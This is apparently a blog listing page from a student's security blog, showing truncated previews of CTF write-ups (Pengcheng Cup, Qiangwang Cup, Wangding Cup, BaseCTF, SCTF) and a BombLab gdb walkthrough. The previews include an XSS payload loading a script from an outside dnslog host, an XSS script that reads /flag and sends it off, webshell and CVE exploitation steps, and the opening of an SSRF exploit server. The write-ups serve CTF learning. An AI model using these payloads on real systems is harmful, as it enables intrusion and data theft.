数据结构-考研408
42fcf649d1fed698f8818e6945be142ca710d5b491358d30a69e1ba3c6da42c6000df623b9b6572654a0ff9a6e2e5cf6dfa15a8ef49c04419fe1b1452d7f5b242123daec7300eff8f3755a1753089abb3693081d2ca1b5cd7d6c0c8d096945f0e2ca5b17b22e5663a43b3c9b96c8bbd2
Only for 0pium.
CSAPP-BombLab(GZHU广州大学改良版)
必备知识:x86-64寄存器
Linux x64环境下,根据调用约定,传参顺序为 rdi, rsi, rdx, rcx, r8, r9。剩下的参数通过栈传递,从右至左顺序入栈。汇编指令
phase_1gdb ./bomb
(gdb) disas phase_1Dump of assembler code for function phase_1:0x00000000000015e7 <+0>: endbr64 # 控制流保护指令,防止返回导向攻击(ROP)0x00000000000015eb <+4>: sub $0x8,%rsp # 将栈指针 %rsp 减少 0x8 字节,为局部变量分配空间0x00000000000015ef <+8>: lea 0x1b56(%rip),%rsi # 0x314c # 计算字符串常量地址并加载到寄存器 %rsi0x00000000000015f6 <+15>: call 0x1b6c & ...
2024鹏城杯
Webezlaravel-pcb2024cve直接打【漏洞复现】CVE-2021-3129_laravel
哥斯拉3之前连接
python口算脚本:import requestsimport timedef fetch_and_calculate(): try: # 从/calc路径获取算术表达式 calc_url = 'http://192.168.18.28/calc' response = requests.get(calc_url) response.raise_for_status() # 如果请求失败,将抛出异常 expression = response.text.strip() # 计算算术表达式的结果 answer = eval(expression) print(f"Calculated Answer: {answer}") # 构建提交答案的URL submi ...
2024强网杯
最终排名:131Webxiaohuanxiong(WP)先去访问/install安装好
找到xiaohuanxiong源码 xiaohuanxiong ,审代码
看到这个可以新增管理员,访问/admin/Admins进入后台,url变为:http://ip/admin/admins 然后在管理员新增那里添加管理员,返回可以看到成功添加
然后路由扫描扫到了/admin/login
登录管理员
成功登录,然后在支付管理的支付设置中找到有php代码,直接写入
点击提交就有flag
Snake(WP)做过类似的题,因为格子数量比较少,不用BFS,直接遍历每个格子即可脚本:import requestsimport jsonurl = 'http://eci-2zect3m6hd6899ir5njc.cloudeci1.ichunqiu.com:5000/move'cookies = {'Cookie': 'session=eyJ1c2VybmFtZSI6ImFkbWluIn0.Zy ...
2024网鼎杯-青龙组-WP
最终排名:309
Web签到网鼎杯公众号得到flagWEB02首先是登录系统任意账号密码登录
然后测试存在xss漏洞
dnslog测试也成功,payload:**<script src=http://dnslog的ip></script>**
第三步使用xss脚本将/flag路由的响应回显到当前界面(/flag路由打开f12可以看到)<script>(function() { var opium = new XMLHttpRequest(); opium.open('GET', '/flag', true); opium.onload = function() { if (opium.status === 200) { var flagData = opium.responseText; sendFlag(flagData); } }; o ...
方兴未艾第35期|Google Hacking教育漏洞实战
发布在广州大学方班预备班公众号-栏目’方兴未艾’链接:https://mp.weixin.qq.com/s/vrjFQclFgDmZWmEyDu5OCw
BaseCTF2024 Web WP
Web[week1] A Dark Room考点:f12源代码查看做题步骤 :第一题我就想到了很简单,所以直接找源码看看,直接点击enable audio然后点击生活查看源代码得到flag
[Week1] Aura 酱的礼物考点:f12源代码查看
做题步骤 :首先看到file_get_contents($pen)!=='Aura'我就立马想到data伪协议来绕过,所以构造pen=data://text/plain,Aura然后接下来看到$challenge=$_POST['challenge'];if strpos($challenge,'http://jasmineaura.github.io')!==0){die('这不是Aura的博客!');}$blog_content=file_get_contents($challenge);if(strpos($blog_content,'已经收到Kengwang的礼物啦')===false){die('请去博客里面写下感想 ...
SCTF2024 Web&Misc 复现
Webezjump参考链接:
【网络安全】「漏洞复现」(五)从 NextJS SSRF 漏洞看 Host 头滥用所带来的危害
Redis主从复制实现RCE
CVE-2024-34351 漏洞复现
首先跑去搜索文章,找到【网络安全】「漏洞复现」(五)从 NextJS SSRF 漏洞看 Host 头滥用所带来的危害发现和我抓包back to home界面极其相似从而得知是NextJS SSRF 漏洞,也就是CVE-2024-34351,由Next.js异步函数createRedirectRenderResult导致的SSRF。
同时docker-compose.yml给出了内网ip
题目源码中的重定向代码:
SSRF验证:
脚本:exp.py
from flask import Flask, request, Response, redirectapp = Flask(__name__)@app.route('/play')def exploit(): # CORS preflight check if request.method == ' ...